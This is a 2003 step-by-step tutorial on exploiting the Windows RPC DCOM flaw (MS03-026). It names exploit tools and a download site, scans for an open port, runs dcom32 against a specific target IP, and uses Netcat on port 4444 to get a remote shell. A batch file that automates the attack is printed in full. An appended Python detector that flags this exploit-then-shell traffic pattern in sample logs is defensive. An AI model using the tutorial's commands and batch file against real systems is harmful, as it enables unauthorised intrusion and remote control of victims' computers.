The Microsoft Windows NT4/2000/XP/2003
RPC Buffer Overrun Exploit (MS03-026)
By
Pol Balaguer
August 2003
Manila, Philippines
This is my first time using this exploit; it was just a week ago (July 16, 2003) that Microsoft
announced this flaw in its operating systems. After that, source code and exploit tools were
released and scattered across the Internet.
By the way, these are the files we need:
dcom32.exe
nc.exe
rpcx.bat (released as rcpx.bat on the Internet; just rename it)
These are the few basic files we need for the exploit; the other files can be downloaded from
http://illmob.org/rpc, or you can check the media disk included with this tutorial.
So for a start... you need an IP scanner and, at the same time, a port scanner. I got one program
from www.webattack.com, the Angry IP Scanner; it is a good IP and port scanner.
We have a target IP, 202.81.181.34. The IP scanner uses color coding: red = dead host,
blue = alive host but no open port, green = alive and port is open.
Executing dcom32.exe requires a parameter to choose the operating system of your victim's box.
Options on dcom32.exe:
0 Windows 2000 SP0 (english)
1 Windows 2000 SP1 (english)
2 Windows 2000 SP2 (english)
3 Windows 2000 SP3 (english)
4 Windows 2000 SP4 (english)
5 Windows XP SP0 (english)
6 Windows XP SP1 (english)
This is a customized program; some distributions include the NT4, Chinese, Polish and
other international versions of Windows.
Syntax:
dcom32 <os code> <victims ip>
nc <victims ip> 4444
4444 is the standard port to connect to the victim’s computer.
Since I already have an IP with an open port, it's time to get a shell. At this point I do it manually
and don't use rpcx.bat (the batch file) for the time being... we will be using it later...
Take a look at the picture above; I already issued dcom32 to inject code into the RPC port of
the remote computer, expecting my victim's box to be running Windows XP with Service Pack 0 (SP0).
If this fails, try other options, like "6" for a box with SP1 installed.
Use Netcat to connect to 202.81.181.34:4444.
Injection was successful...
nc 202.81.181.34 4444
Now, let's use Netcat (nc) to give us a shell.
Boom! It drops me into a shell...
Note: If you fail to connect, use options 5 and 6; you can also try the Windows 2000 options from
0 to 4. For me, I just started with 5 as it is the most common operating system used by regular
users.
Here is the version of rpcx.bat... it passes the values on to the commands, which are then
executed by the batch file.
@echo on
@echo - 0 Windows 2000 SP0 (english)
@echo - 1 Windows 2000 SP1 (english)
@echo - 2 Windows 2000 SP2 (english)
@echo - 3 Windows 2000 SP3 (english)
@echo - 4 Windows 2000 SP4 (english)
@echo - 5 Windows XP SP0 (english)
@echo - 6 Windows XP SP1 (english)
dcom32 %1 %2
nc -vvv %2 4444
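The sequence this tutorial walks through (a port sweep, an RPC exploit against one host, then a Netcat connection to the payload's listener on TCP 4444) leaves a recognisable footprint in connection logs. The following detection example is added here and is not part of the original tutorial; it assumes the DCOM/RPC endpoint mapper on TCP 135 as the exploited service port and a constructed firewall-style record format.

```python
from datetime import datetime, timedelta
from typing import NamedTuple

RPC_PORT = 135      # DCOM/RPC endpoint mapper; port assumed, not stated in the tutorial
SHELL_PORT = 4444   # port the tutorial's dcom32 payload listens on
WINDOW = timedelta(minutes=5)

class Conn(NamedTuple):
    ts: datetime
    src: str
    dst: str
    dport: int

def parse_line(line: str) -> Conn:
    # Constructed record format: "2003-08-01T10:00:00 tcp 10.0.0.5 -> 192.168.1.20:135"
    ts, _proto, src, _arrow, dst = line.split()
    host, port = dst.rsplit(":", 1)
    return Conn(datetime.fromisoformat(ts), src, host, int(port))

def find_rpc_then_shell(lines):
    # Flag (src, dst) pairs where an RPC contact is followed within WINDOW by a
    # connection to SHELL_PORT on the same host: the exploit-then-nc sequence.
    conns = sorted((parse_line(l) for l in lines if l.strip()), key=lambda c: c.ts)
    last_rpc, alerts = {}, []          # (src, dst) -> time of most recent RPC contact
    for c in conns:
        key = (c.src, c.dst)
        if c.dport == RPC_PORT:
            last_rpc[key] = c.ts
        elif c.dport == SHELL_PORT and key in last_rpc and c.ts - last_rpc[key] <= WINDOW:
            alerts.append((c.src, c.dst, c.ts.isoformat()))
    return alerts

def find_rpc_sweep(lines, min_hosts=3):
    # Flag sources touching RPC_PORT on at least min_hosts distinct hosts: the
    # footprint of the IP/port-scanning step that precedes the exploit.
    targets = {}
    for c in (parse_line(l) for l in lines if l.strip()):
        if c.dport == RPC_PORT:
            targets.setdefault(c.src, set()).add(c.dst)
    return sorted(src for src, hosts in targets.items() if len(hosts) >= min_hosts)
# Constructed sample records (not real traffic); deliberately out of time order.
SAMPLE_LOG = """\
2003-08-01T10:00:00 tcp 10.0.0.5 -> 192.168.1.20:135
2003-08-01T10:00:01 tcp 10.0.0.5 -> 192.168.1.21:135
2003-08-01T10:00:02 tcp 10.0.0.5 -> 192.168.1.22:135
2003-08-01T10:00:07 tcp 10.0.0.5 -> 192.168.1.20:4444
2003-08-01T10:01:00 tcp 10.0.0.9 -> 192.168.1.21:4444
2003-08-01T10:30:00 tcp 10.0.0.7 -> 192.168.1.22:4444
2003-08-01T09:00:00 tcp 10.0.0.7 -> 192.168.1.22:135
""".splitlines()
```

On the sample, only 10.0.0.5 is reported by both checks: 10.0.0.9 hits 4444 with no prior RPC contact, and 10.0.0.7's RPC contact is too far ahead of its 4444 connection to fall inside the window.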